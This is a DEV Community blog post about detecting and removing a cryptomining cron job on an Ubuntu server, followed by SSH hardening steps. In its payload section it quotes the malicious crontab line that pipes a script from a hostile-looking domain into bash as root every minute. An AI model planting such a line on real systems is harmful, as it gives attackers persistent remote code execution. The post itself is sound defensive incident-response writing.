DEV Community

Faruk
Faruk

Posted on • Originally published at Medium

How I Found an Unknown Cron Job Mining Crypto on My Ubuntu Server | by Faruk Ahmed | Jun, 2025

#cron #bash #server #jobs

How I Found an Unknown Cron Job Mining Crypto on My Ubuntu Server

--

Listen

Share

Intro: It started as a slight spike in CPU usage. Nothing dramatic. But something felt…off. What I thought was a background update turned out to be a sneaky cron job mining cryptocurrency. Here’s how I caught it — and how you can protect your own Linux servers from the same fate.

1. Noticing the Signs: CPU Usage Spikes

I ran:

top
Enter fullscreen mode Exit fullscreen mode

The load average was way too high for a quiet server. A mysterious kworker process and unusually high usage by cron were my first clues.

2. Listing Suspicious Cron Jobs

I checked root’s cron jobs:

sudo crontab -l
Enter fullscreen mode Exit fullscreen mode

Then checked system-wide jobs:

ls -l /etc/cron.*cat /etc/crontab
Enter fullscreen mode Exit fullscreen mode

Hidden deep in /etc/cron.d/, I found a script scheduled to run every minute with a suspicious curl download followed by execution.

3. Investigating the Payload

The cron job downloaded a file from a shady-looking domain and executed it:

*/1 * * * * root curl -s http://badactor.site/xmrig.sh | bash
Enter fullscreen mode Exit fullscreen mode

It was a crypto mining script using my server’s CPU to earn money — for someone else.

4. Killing the Miner and Cleaning Up

I ran:

ps aux | grep xmrigsudo kill -9 <PID>
Enter fullscreen mode Exit fullscreen mode

Then I deleted any downloaded payloads and removed the cron job.

5. Finding the Root Cause

How did it get in? I reviewed auth logs:

sudo cat /var/log/auth.log | grep ssh
Enter fullscreen mode Exit fullscreen mode

Turns out, the attacker brute-forced an old, unused account that still had SSH access. Lesson learned.

6. Hardening the Server

✅ Disabled password login:

sudo nano /etc/ssh/sshd_config# Set:PasswordAuthentication no
Enter fullscreen mode Exit fullscreen mode

✅ Used Fail2Ban to block brute-force attempts:

sudo apt install fail2ban
Enter fullscreen mode Exit fullscreen mode

✅ Set up alerts for new cron jobs and processes.

Conclusion:

If your Linux server starts acting strange, don’t ignore it. Attackers often hide in plain sight, using cron and system tools to stay under the radar. Review your logs, check your cron jobs, and harden your system — before it’s too late.

💬 Question: What steps have you taken to monitor cron jobs and system resource usage? 🙏 Thank you for being a part of this security-aware community!

👏 Before you go: Be sure to clap and follow me!

🔗 Follow me on social media: LinkedIn: https://www.linkedin.com/in/bornaly/ Medium: https://medium.com/@bornaly/subscribe

Top comments (0)